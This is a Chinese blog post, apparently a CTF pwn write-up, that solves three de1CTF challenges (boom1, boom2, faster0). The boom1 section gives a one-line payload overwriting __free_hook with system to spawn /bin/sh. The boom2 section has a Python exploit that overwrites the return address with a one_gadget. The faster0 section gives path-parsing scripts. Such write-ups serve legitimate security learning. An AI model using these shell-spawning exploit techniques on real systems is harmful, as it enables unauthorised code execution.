<!DOCTYPE HTML>
<html>
<head>
  <meta charset="utf-8">
  <meta http-equiv="pragma" content="no-cache">
  <meta http-equiv="cache-control" content="no-cache">
  <meta http-equiv="expires" content="0">
  
  <title>网鼎杯pwn WP | 白里个白</title>
  <meta name="author" content="SofrWhite">
  
  <meta name="description" content="前言本周参加了两个比赛，一个是de1CTF，另一个是网鼎杯，把这两场比赛全部总结一下。
在de1CTF中，有幸拿了一个签到pwn的一血，也是蛮开心的，其中boom1和boom2主要是两道类似于编译和执行的题目，boom1要求选手写一些高级语言，boom2要求选手写类似于机器码，总体来说都不难，最后的faster0也是这几次常出现的aeg题目，其实更准确的应该说是自动逆向的题目，和最后漏洞利用其实相关性不大。
将这些题目总结一下吧。
关键字： CTF pwn baby aeg 网鼎杯">
  
  
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">

  <meta property="og:title" content="网鼎杯pwn WP"/>
  <meta property="og:site_name" content="白里个白"/>

  
    <meta property="og:image" content=""/>
  

  
  
    <link href="/favicon.png" rel="icon">
  
  
  <link rel="stylesheet" href="/css/bootstrap.min.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/font-awesome.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/style.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/responsive.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/highlight.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/google-fonts.css" media="screen" type="text/css">
  <!--[if lt IE 9]><script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script><![endif]-->

  <script src="/js/jquery-2.0.3.min.js"></script>

  <!-- analytics -->
  


<script>
var _hmt = _hmt || [];
(function() {
  var hm = document.createElement("script");
  hm.src = "//hm.baidu.com/hm.js?70c14b3774d11227a872a4e3d91d46e9";
  var s = document.getElementsByTagName("script")[0]; 
  s.parentNode.insertBefore(hm, s);
})();
</script>


<meta name="generator" content="Hexo 4.2.0"></head>

 <body>  
  <nav id="main-nav" class="navbar navbar-inverse navbar-fixed-top" role="navigation">
    <div class="container">
      <button type="button" class="navbar-header navbar-toggle" data-toggle="collapse" data-target=".navbar-collapse">
		<span class="sr-only">Toggle navigation</span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
      </button>
	  <a class="navbar-brand" href="/">白里个白</a>
      <div class="collapse navbar-collapse nav-menu">
		<ul class="nav navbar-nav">
		  
		  <li>
			<a href="/archives" title="All the articles.">
			  <i class=""></i>Archives
			</a>
		  </li>
		  
		  <li>
			<a href="/categories" title="All the categories.">
			  <i class=""></i>Categories
			</a>
		  </li>
		  
		  <li>
			<a href="/tags" title="All the tags.">
			  <i class=""></i>Tags
			</a>
		  </li>
		  
		  <li>
			<a href="/about" title="About me.">
			  <i class=""></i>About
			</a>
		  </li>
		  
		</ul>
      </div>
    </div> <!-- container -->
</nav>
<div class="clearfix"></div>

  <div class="container">
  	<div class="content">
    	 


	
		<div class="page-header">
			<h1> 网鼎杯pwn WP</h1>
		</div>
	



<div class="row post">
	<!-- cols -->
	
	<div id="top_meta"></div>
	<div class="col-md-9">
	

	<!-- content -->
	<div class="mypage">		
	  		

	  <h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>本周参加了两个比赛，一个是de1CTF，另一个是网鼎杯，把这两场比赛全部总结一下。</p>
<p>在de1CTF中，有幸拿了一个签到pwn的一血，也是蛮开心的，其中boom1和boom2主要是两道类似于编译和执行的题目，boom1要求选手写一些高级语言，boom2要求选手写类似于机器码，总体来说都不难，最后的faster0也是这几次常出现的aeg题目，其实更准确的应该说是自动逆向的题目，和最后漏洞利用其实相关性不大。</p>
<p>将这些题目总结一下吧。</p>
<p>关键字： <code>CTF</code> <code>pwn</code> <code>baby aeg</code> <code>网鼎杯</code></p>
<a id="more"></a>

<h2 id="boom1"><a href="#boom1" class="headerlink" title="boom1"></a>boom1</h2><h3 id="题目描述"><a href="#题目描述" class="headerlink" title="题目描述"></a>题目描述</h3><p>boom1打开后看起来内容很多，其实很多内容都不需要逆向。首先看到下面这个字符串时，已经大致猜到了什么：</p>
<p><img src="/2020/05/11/wdb-wp/image-20200511101514250.png" alt="image-20200511101514250"></p>
<p>这就类似于高级语言预订的一些关键词，那么也就是，我们用这些东西来写程序就好了。</p>
<p>在后面的动态运行中，我发现了，需要定义main函数，以及需要分号作为结尾。而且函数只能运行一次：</p>
<p><img src="/2020/05/11/wdb-wp/image-20200511101754172.png" alt="image-20200511101754172"></p>
<p>否则就会打印NOTALLOW。</p>
<h3 id="思路"><a href="#思路" class="headerlink" title="思路"></a>思路</h3><p>修改__free_hook为system，最后调用free(“/bin/sh”);</p>
<p>这个程序会把我们写好的程序的变量之类的，放置在malloc的区域，而此时malloc的大小是0x40000的，也就是这一空间必然是mmap出的新空间，且与libc是相邻的，那么我们就不需要知道libc的基地址，而直接通过偏移去得到__free_hook和system的地址。</p>
<h3 id="pwn！！！"><a href="#pwn！！！" class="headerlink" title="pwn！！！"></a>pwn！！！</h3><p>首先判断libc版本，在内存中，其实是有libc版本记录的地方，在peda中使用类似:<code>find 2.23</code>，这样的语句就可以找到，而且总是有一个地址是与0x8对齐的，因为我们这里计算的偏移都是以0x8为一个单位。最后我计算出这个偏移为471879。计算方法就是用定义的a的地址减去目标地址，最后除以8。</p>
<p><img src="/2020/05/11/wdb-wp/image-20200511102438106.png" alt="image-20200511102438106"></p>
<p>可以看到，此时打印2.23，那么原创也可以测试出来就是2.23的libc版本。</p>
<p>最后用类似的方法计算出free_hook和system的值就好了：</p>
<p><img src="/2020/05/11/wdb-wp/image-20200511102639601.png" alt="image-20200511102639601"></p>
<p>最后的payload：<code>main(){int a;*(&amp;a-180998)=&amp;a-640393;free(&quot;/bin/sh&quot;);}</code></p>
<p>就这样，我也收获了签到题的一血，开心！！！：</p>
<p><img src="/2020/05/11/wdb-wp/image-20200511102904540.png" alt="image-20200511102904540"></p>
<p>最后说一下，这个题payload真的太短了，太简单py了，感觉主办方需要考虑这个问题。</p>
<h2 id="boom2"><a href="#boom2" class="headerlink" title="boom2"></a>boom2</h2><h3 id="题目描述-1"><a href="#题目描述-1" class="headerlink" title="题目描述"></a>题目描述</h3><p>boom2是需要逆向的一道题目：</p>
<p>我只说几个关键的逆向：</p>
<h4 id="大体机制"><a href="#大体机制" class="headerlink" title="大体机制"></a>大体机制</h4><p>本题主要是一个栈空间，附带一个寄存器。</p>
<p>我们输入指令的时候需要一个指令占64bit，也就是8个字节</p>
<h4 id="push指令–13"><a href="#push指令–13" class="headerlink" title="push指令–13"></a>push指令–13</h4><p>直接p64(13)就是push。</p>
<p><img src="/2020/05/11/wdb-wp/image-20200511103128303.png" alt="image-20200511103128303"></p>
<h4 id="pop操作指令–后面全都是"><a href="#pop操作指令–后面全都是" class="headerlink" title="pop操作指令–后面全都是"></a>pop操作指令–后面全都是</h4><p>直接p64(指令)，就是寄存器和pop出值得运算</p>
<p><img src="/2020/05/11/wdb-wp/image-20200511103209604.png" alt="image-20200511103209604"></p>
<h4 id="给寄存器赋值的方式"><a href="#给寄存器赋值的方式" class="headerlink" title="给寄存器赋值的方式"></a>给寄存器赋值的方式</h4><p><img src="/2020/05/11/wdb-wp/image-20200511103333685.png" alt="image-20200511103333685"></p>
<p>指令0：p64(0)+p64(offset)   把相对于bp为offset的地址赋值给寄存器</p>
<p>指令1：p64(1)+p64(num)   把num赋值给寄存器</p>
<h4 id="给pop出的地址赋值"><a href="#给pop出的地址赋值" class="headerlink" title="给pop出的地址赋值"></a>给pop出的地址赋值</h4><p><img src="/2020/05/11/wdb-wp/image-20200511103502751.png" alt="image-20200511103502751"></p>
<p>直接p64(11)就是把pop出的一个地址，将寄存器的值赋值给pop出地址中的内容。</p>
<h3 id="思路-1"><a href="#思路-1" class="headerlink" title="思路"></a>思路</h3><p>有了这些东西，思路就很简单了，找到_environ的值，计算出EIP的值，更换成one_gadget。</p>
<h3 id="exp-主体"><a href="#exp-主体" class="headerlink" title="exp 主体"></a>exp 主体</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">one = <span class="number">0xf1147</span></span><br><span class="line">ru(<span class="string">"Input your code&gt; "</span>)</span><br><span class="line">payload = p64(<span class="number">1</span>)+p64(<span class="number">18446744073709551376</span>)<span class="comment">#tmp=-0xf0</span></span><br><span class="line">payload += p64(<span class="number">13</span>) <span class="comment">#push -0xf0</span></span><br><span class="line">payload += p64(<span class="number">0</span>)+p64(<span class="number">18446744073709271013</span>)<span class="comment">#0x7f96e2df6010 get _environ address</span></span><br><span class="line">payload += p64(<span class="number">9</span>) <span class="comment">#get _environ</span></span><br><span class="line">payload += p64(<span class="number">25</span>) <span class="comment">#_environ-0xf0(EIP)</span></span><br><span class="line">payload += p64(<span class="number">13</span>) <span class="comment">#push EIP</span></span><br><span class="line">payload += p64(<span class="number">1</span>)+p64(one)<span class="comment">#tmp= onegadget offset</span></span><br><span class="line">payload += p64(<span class="number">13</span>) <span class="comment">#push tmp</span></span><br><span class="line">payload += p64(<span class="number">0</span>)+p64(<span class="number">18446744073708775934</span>)<span class="comment">#libc_start</span></span><br><span class="line">payload += p64(<span class="number">25</span>) <span class="comment">#tmp = libc_start+tmp</span></span><br><span class="line">payload += p64(<span class="number">11</span>) <span class="comment">#edit EIP</span></span><br><span class="line">debug()</span><br><span class="line">s(payload)</span><br><span class="line">getshell()</span><br></pre></td></tr></table></figure>

<p>最后：</p>
<p><img src="/2020/05/11/wdb-wp/image-20200511103849331.png" alt="image-20200511103849331"></p>
<h2 id="faster0"><a href="#faster0" class="headerlink" title="faster0"></a>faster0</h2><h3 id="题目描述-2"><a href="#题目描述-2" class="headerlink" title="题目描述"></a>题目描述</h3><p>这个题目就是很多个路径，而且有回路，angr直接去跑是不可以的，这道题由于比较简单，所以使用angr就有点杀鸡牛刀的感觉了，直接objdump出某个函数，然后分析这个函数的分支就可以了，用disasm也是可以的，最后就是一个栈溢出了，这里我就把前面寻找路径的exp贴出来，最后的栈溢出，过于基础，就不提了。</p>
<h3 id="思路-2"><a href="#思路-2" class="headerlink" title="思路"></a>思路</h3><p>首先给出一个objdump 某个函数的脚本，我们主要利用这个脚本：</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#!/bin/bash</span></span><br><span class="line"></span><br><span class="line">vmlinux=<span class="variable">$1</span></span><br><span class="line">symbol=<span class="variable">$2</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> [ -z <span class="string">"<span class="variable">$vmlinux</span>"</span> ]; <span class="keyword">then</span></span><br><span class="line">            <span class="built_in">echo</span> <span class="string">"usage : <span class="variable">$0</span> vmlinux symbol"</span></span><br><span class="line">                    <span class="built_in">exit</span></span><br><span class="line">                <span class="keyword">fi</span></span><br><span class="line"></span><br><span class="line">                startaddress=$(nm -n <span class="variable">$vmlinux</span> | grep <span class="string">"\w\s<span class="variable">$symbol</span>"</span> | awk <span class="string">'&#123;print "0x"$1;exit&#125;'</span>)</span><br><span class="line">                endaddress=$(nm -n <span class="variable">$vmlinux</span> | grep -A1 <span class="string">"\w\s<span class="variable">$symbol</span>"</span> | awk <span class="string">'&#123;getline; print "0x"$1;exit&#125;'</span>)</span><br><span class="line"></span><br><span class="line">                <span class="keyword">if</span> [ -z <span class="string">"<span class="variable">$symbol</span>"</span> ]; <span class="keyword">then</span></span><br><span class="line">                            <span class="built_in">echo</span> <span class="string">"dump all symbol"</span></span><br><span class="line">                                    objdump -d <span class="variable">$vmlinux</span></span><br><span class="line">                                <span class="keyword">else</span></span><br><span class="line">                                            <span class="built_in">echo</span> <span class="string">"start-address: <span class="variable">$startaddress</span>, end-address: <span class="variable">$endaddress</span>"</span></span><br><span class="line">                                                    objdump -d <span class="variable">$vmlinux</span> --start-address=<span class="variable">$startaddress</span> --stop-address=<span class="variable">$endaddress</span></span><br><span class="line">                                                <span class="keyword">fi</span></span><br></pre></td></tr></table></figure>

<p>最后解析的过程：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line">num=<span class="number">0</span></span><br><span class="line">result = <span class="string">""</span></span><br><span class="line"><span class="keyword">while</span>(max!=<span class="number">100</span>):</span><br><span class="line">    fun_name = <span class="string">"func"</span>+str(max).rjust(<span class="number">3</span>,<span class="string">"0"</span>)</span><br><span class="line">    os.system(<span class="string">"./objdump_function.sh b "</span>+fun_name+<span class="string">" &gt; "</span>+fun_name)</span><br><span class="line">    fun_content = open(fun_name,<span class="string">"r"</span>).read()</span><br><span class="line">    fun_content = fun_content.split(<span class="string">'\n'</span>)</span><br><span class="line">    max_address = <span class="number">0</span></span><br><span class="line">    list =<span class="number">0</span></span><br><span class="line">    num+=<span class="number">1</span></span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> fun_content:</span><br><span class="line">        <span class="keyword">if</span> (<span class="string">"callq"</span> <span class="keyword">in</span> i) <span class="keyword">and</span>(<span class="string">"func"</span> <span class="keyword">in</span> i):</span><br><span class="line">            tmp = i.split(<span class="string">" &lt;func"</span>)</span><br><span class="line">            a = tmp[<span class="number">1</span>].split(<span class="string">"&gt;"</span>)[<span class="number">0</span>]</span><br><span class="line">            <span class="keyword">if</span> int(a)==num:</span><br><span class="line">                num =int(a)</span><br><span class="line">                <span class="comment">#max_address = int("0x"+tmp[0].split("callq  ")[1],16)</span></span><br><span class="line">                max_list = list</span><br><span class="line">            list +=<span class="number">1</span></span><br><span class="line">    print(max_list)</span><br><span class="line">    result+=str(max_list)</span><br><span class="line">    print(result)</span><br></pre></td></tr></table></figure>

<p>得到如下解析结果：</p>
<p><img src="/2020/05/11/wdb-wp/image-20200511104510265.png" alt="image-20200511104510265"></p>
<p>最后由exp输入给程序得到：</p>
<p><img src="/2020/05/11/wdb-wp/image-20200511104533332.png" alt="image-20200511104533332"></p>
<p>最后就是一个简单的栈溢出，直接用ROP就OK了。</p>
	  
	</div>

	<div>
  	<center>
	<div class="pagination">

    
    
    <a href="/2020/05/11/re2dl_resolve/" type="button" class="btn btn-default"><i
                class="fa fa-arrow-circle-o-left"></i> Prev</a>
    

    <a href="/" type="button" class="btn btn-default"><i class="fa fa-home"></i>Home</a>
    
    <a href="/2020/04/02/LargebinAttack/" type="button" class="btn btn-default ">Next<i
                class="fa fa-arrow-circle-o-right"></i></a>
    

    
</div>

    </center>
	</div>
	
	<!-- comment -->
	
<section id="comment">
    <h2 class="title">Comments</h2>

    
</section>


	</div> <!-- col-md-9/col-md-12 -->
		
	
	<div id="side_meta">
		<div class="col-md-3" id="post_meta"> 

	<!-- date -->
	
	<div class="meta-widget">
	<i class="fa fa-clock-o"></i>
	2020-05-11 
	</div>
	

	<!-- categories -->
    
	<div class="meta-widget">
	<a data-toggle="collapse" data-target="#categorys"><i class="fa fa-folder"></i></a>	
    <ul id="categorys" class="tag_box list-unstyled collapse in">
          
  <li>
    <li><a href="/categories/pwn/">pwn<span>4</span></a></li>
  </li>

    </ul>
	</div>
	

	<!-- tags -->
	
	<div class="meta-widget">
	<a data-toggle="collapse" data-target="#tags"><i class="fa fa-tags"></i></a>		  
    <ul id="tags" class="tag_box list-unstyled collapse in">	  
	    
  <li><a href="/tags/libc/">libc<span>4</span></a></li> <li><a href="/tags/baby-aeg/">baby_aeg<span>1</span></a></li>
    </ul>
	</div>
		

	<!-- toc -->
	<div class="meta-widget">
	
	   <a data-toggle="collapse" data-target="#toc"><i class="fa fa-bars"></i></a>
	   <div id="toc" class="toc collapse in">
		   <span class="toc-title">Contents</span>
			<ol class="toc-article"><li class="toc-article-item toc-article-level-2"><a class="toc-article-link" href="#前言"><span class="toc-article-text">前言</span></a></li><li class="toc-article-item toc-article-level-2"><a class="toc-article-link" href="#boom1"><span class="toc-article-text">boom1</span></a><ol class="toc-article-child"><li class="toc-article-item toc-article-level-3"><a class="toc-article-link" href="#题目描述"><span class="toc-article-text">题目描述</span></a></li><li class="toc-article-item toc-article-level-3"><a class="toc-article-link" href="#思路"><span class="toc-article-text">思路</span></a></li><li class="toc-article-item toc-article-level-3"><a class="toc-article-link" href="#pwn！！！"><span class="toc-article-text">pwn！！！</span></a></li></ol></li><li class="toc-article-item toc-article-level-2"><a class="toc-article-link" href="#boom2"><span class="toc-article-text">boom2</span></a><ol class="toc-article-child"><li class="toc-article-item toc-article-level-3"><a class="toc-article-link" href="#题目描述-1"><span class="toc-article-text">题目描述</span></a><ol class="toc-article-child"><li class="toc-article-item toc-article-level-4"><a class="toc-article-link" href="#大体机制"><span class="toc-article-text">大体机制</span></a></li><li class="toc-article-item toc-article-level-4"><a class="toc-article-link" href="#push指令–13"><span class="toc-article-text">push指令–13</span></a></li><li class="toc-article-item toc-article-level-4"><a class="toc-article-link" href="#pop操作指令–后面全都是"><span class="toc-article-text">pop操作指令–后面全都是</span></a></li><li class="toc-article-item toc-article-level-4"><a class="toc-article-link" href="#给寄存器赋值的方式"><span class="toc-article-text">给寄存器赋值的方式</span></a></li><li class="toc-article-item toc-article-level-4"><a class="toc-article-link" href="#给pop出的地址赋值"><span class="toc-article-text">给pop出的地址赋值</span></a></li></ol></li><li class="toc-article-item toc-article-level-3"><a class="toc-article-link" href="#思路-1"><span class="toc-article-text">思路</span></a></li><li class="toc-article-item toc-article-level-3"><a class="toc-article-link" href="#exp-主体"><span class="toc-article-text">exp 主体</span></a></li></ol></li><li class="toc-article-item toc-article-level-2"><a class="toc-article-link" href="#faster0"><span class="toc-article-text">faster0</span></a><ol class="toc-article-child"><li class="toc-article-item toc-article-level-3"><a class="toc-article-link" href="#题目描述-2"><span class="toc-article-text">题目描述</span></a></li><li class="toc-article-item toc-article-level-3"><a class="toc-article-link" href="#思路-2"><span class="toc-article-text">思路</span></a></li></ol></li></ol>
		</div>
	
	</div>
	
    <hr>
	
</div><!-- col-md-3 -->

	</div>
		

</div><!-- row -->



	</div>
  </div>
  <div class="container-narrow">
  <footer>  </footer>
</div> <!-- container-narrow -->
  


  
<a id="gotop" href="#">   
  <span>⬆︎TOP</span>
</a>

<script src="/js/jquery.imagesloaded.min.js"></script>
<script src="/js/gallery.js"></script>
<script src="/js/bootstrap.min.js"></script>
<script src="/js/main.js"></script>
<script src="/js/search.js"></script> 


<link rel="stylesheet" href="/fancybox/jquery.fancybox.css" media="screen" type="text/css">
<script src="/fancybox/jquery.fancybox.pack.js"></script>
<script type="text/javascript">
(function($){
  $('.fancybox').fancybox();
})(jQuery);
</script>



   <script type="text/javascript">      
     var search_path = "search.xml";
	 if (search_path.length == 0) {
	 	search_path = "search.xml";
	 }
	 var path = "/" + search_path;
     searchFunc(path, 'local-search-input', 'local-search-result');
   </script>

</body>
   </html>
